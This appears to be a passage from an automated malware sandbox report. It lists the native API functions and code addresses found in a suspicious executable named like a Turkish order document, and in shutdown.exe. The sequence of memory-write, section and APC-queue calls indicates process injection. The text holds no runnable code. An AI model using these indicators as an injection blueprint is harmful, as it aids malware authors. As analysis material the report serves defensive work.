            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772D00 NtSetInformationFile,5_2_01772D00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772DD0 NtDelayExecution,5_2_01772DD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772DB0 NtEnumerateKey,5_2_01772DB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772C60 NtCreateKey,5_2_01772C60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772C00 NtQueryInformationProcess,5_2_01772C00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772CF0 NtOpenProcess,5_2_01772CF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772CC0 NtQueryVirtualMemory,5_2_01772CC0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772CA0 NtQueryInformationToken,5_2_01772CA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772F60 NtCreateProcessEx,5_2_01772F60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772F30 NtCreateSection,5_2_01772F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772FE0 NtCreateFile,5_2_01772FE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772FB0 NtResumeThread,5_2_01772FB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772FA0 NtQuerySection,5_2_01772FA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772F90 NtProtectVirtualMemory,5_2_01772F90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772E30 NtWriteVirtualMemory,5_2_01772E30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772EE0 NtQueueApcThread,5_2_01772EE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772EA0 NtAdjustPrivilegesToken,5_2_01772EA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772E80 NtReadVirtualMemory,5_2_01772E80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01773010 NtOpenDirectoryObject,5_2_01773010
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01773090 NtSetValueKey,5_2_01773090
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017739B0 NtGetContextThread,5_2_017739B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01773D70 NtOpenThread,5_2_01773D70
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01773D10 NtOpenProcessToken,5_2_01773D10
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B4340 NtSetContextThread,LdrInitializeThunk,13_2_039B4340
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B4650 NtSuspendThread,LdrInitializeThunk,13_2_039B4650
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_039B2BA0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_039B2BF0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2BE0 NtQueryValueKey,LdrInitializeThunk,13_2_039B2BE0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2B60 NtClose,LdrInitializeThunk,13_2_039B2B60
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2AD0 NtReadFile,LdrInitializeThunk,13_2_039B2AD0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2AF0 NtWriteFile,LdrInitializeThunk,13_2_039B2AF0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2FB0 NtResumeThread,LdrInitializeThunk,13_2_039B2FB0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2FE0 NtCreateFile,LdrInitializeThunk,13_2_039B2FE0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2F30 NtCreateSection,LdrInitializeThunk,13_2_039B2F30
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_039B2E80
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2EE0 NtQueueApcThread,LdrInitializeThunk,13_2_039B2EE0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2DD0 NtDelayExecution,LdrInitializeThunk,13_2_039B2DD0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_039B2DF0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2D10 NtMapViewOfSection,LdrInitializeThunk,13_2_039B2D10
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_039B2D30
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_039B2CA0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_039B2C70
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2C60 NtCreateKey,LdrInitializeThunk,13_2_039B2C60
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B35C0 NtCreateMutant,LdrInitializeThunk,13_2_039B35C0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B39B0 NtGetContextThread,LdrInitializeThunk,13_2_039B39B0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2B80 NtQueryInformationFile,13_2_039B2B80
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2AB0 NtWaitForSingleObject,13_2_039B2AB0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2F90 NtProtectVirtualMemory,13_2_039B2F90
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2FA0 NtQuerySection,13_2_039B2FA0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2F60 NtCreateProcessEx,13_2_039B2F60
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2EA0 NtAdjustPrivilegesToken,13_2_039B2EA0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2E30 NtWriteVirtualMemory,13_2_039B2E30
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2DB0 NtEnumerateKey,13_2_039B2DB0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2D00 NtSetInformationFile,13_2_039B2D00
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2CC0 NtQueryVirtualMemory,13_2_039B2CC0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2CF0 NtOpenProcess,13_2_039B2CF0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B2C00 NtQueryInformationProcess,13_2_039B2C00
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B3090 NtSetValueKey,13_2_039B3090
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B3010 NtOpenDirectoryObject,13_2_039B3010
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B3D10 NtOpenProcessToken,13_2_039B3D10
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039B3D70 NtOpenThread,13_2_039B3D70
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03258240 NtDeleteFile,13_2_03258240
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_032582D0 NtClose,13_2_032582D0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03258160 NtReadFile,13_2_03258160
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03258000 NtCreateFile,13_2_03258000
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03258420 NtAllocateVirtualMemory,13_2_03258420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_0105D3640_2_0105D364
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD62500_2_02CD6250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD1BA00_2_02CD1BA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD11980_2_02CD1198
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD11970_2_02CD1197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD71780_2_02CD7178
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_05367D580_2_05367D58
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_053600060_2_05360006
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_053600400_2_05360040
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_0536AEB00_2_0536AEB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F87880_2_072F8788
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F10600_2_072F1060
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F7F280_2_072F7F28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F3D500_2_072F3D50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F877B0_2_072F877B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072FF6B80_2_072FF6B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F24600_2_072F2460
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F24500_2_072F2450
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F7F180_2_072F7F18
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F0F890_2_072F0F89
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F3EE30_2_072F3EE3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F3D420_2_072F3D42
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F3CC80_2_072F3CC8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F19180_2_072F1918
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F19120_2_072F1912
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F79670_2_072F7967
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F79780_2_072F7978
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040E8235_2_0040E823
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004033205_2_00403320
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0042DC935_2_0042DC93
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0041057A5_2_0041057A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040257E5_2_0040257E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004025005_2_00402500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004105835_2_00410583
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00416EB35_2_00416EB3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004027EB5_2_004027EB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004027F05_2_004027F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00402F985_2_00402F98
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00402FA05_2_00402FA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004107A35_2_004107A3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C81585_2_017C8158
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018001AA5_2_018001AA
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DA1185_2_017DA118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017301005_2_01730100
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F81CC5_2_017F81CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F41A25_2_017F41A2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D20005_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FA3525_2_017FA352
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018003E65_2_018003E6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E3F05_2_0174E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E02745_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C02C05_2_017C02C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018005915_2_01800591
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017405355_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F24465_2_017F2446
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E44205_2_017E4420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EE4F65_2_017EE4F6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017407705_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017647505_2_01764750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173C7C05_2_0173C7C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175C6E05_2_0175C6E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017569625_2_01756962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0180A9A65_2_0180A9A6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A05_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174A8405_2_0174A840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017428405_2_01742840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E8F05_2_0176E8F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017268B85_2_017268B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FAB405_2_017FAB40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F6BD75_2_017F6BD7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173EA805_2_0173EA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DCD1F5_2_017DCD1F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174AD005_2_0174AD00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173ADE05_2_0173ADE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01758DBF5_2_01758DBF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740C005_2_01740C00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730CF25_2_01730CF2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0CB55_2_017E0CB5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B4F405_2_017B4F40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01760F305_2_01760F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E2F305_2_017E2F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01782F285_2_01782F28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174CFE05_2_0174CFE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01732FC85_2_01732FC8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BEFA05_2_017BEFA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740E595_2_01740E59
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FEE265_2_017FEE26
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FEEDB5_2_017FEEDB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01752E905_2_01752E90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FCE935_2_017FCE93
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172F1725_2_0172F172
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177516C5_2_0177516C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174B1B05_2_0174B1B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0180B16B5_2_0180B16B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F70E95_2_017F70E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FF0E05_2_017FF0E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EF0CC5_2_017EF0CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017470C05_2_017470C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172D34C5_2_0172D34C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F132D5_2_017F132D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0178739A5_2_0178739A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E12ED5_2_017E12ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175B2C05_2_0175B2C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017452A05_2_017452A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F75715_2_017F7571
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018095C35_2_018095C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DD5B05_2_017DD5B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017314605_2_01731460
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FF43F5_2_017FF43F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FF7B05_2_017FF7B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017856305_2_01785630
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F16CC5_2_017F16CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017499505_2_01749950
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175B9505_2_0175B950
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D59105_2_017D5910
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AD8005_2_017AD800
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017438E05_2_017438E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FFB765_2_017FFB76
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B5BF05_2_017B5BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177DBF95_2_0177DBF9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175FB805_2_0175FB80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B3A6C5_2_017B3A6C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FFA495_2_017FFA49
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F7A465_2_017F7A46
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EDAC65_2_017EDAC6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DDAAC5_2_017DDAAC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01785AA05_2_01785AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E1AA35_2_017E1AA3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F7D735_2_017F7D73
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F1D5A5_2_017F1D5A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01743D405_2_01743D40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175FDC05_2_0175FDC0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B9C325_2_017B9C32
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FFCF25_2_017FFCF2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FFF095_2_017FFF09
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01703FD25_2_01703FD2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01703FD55_2_01703FD5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FFFB15_2_017FFFB1
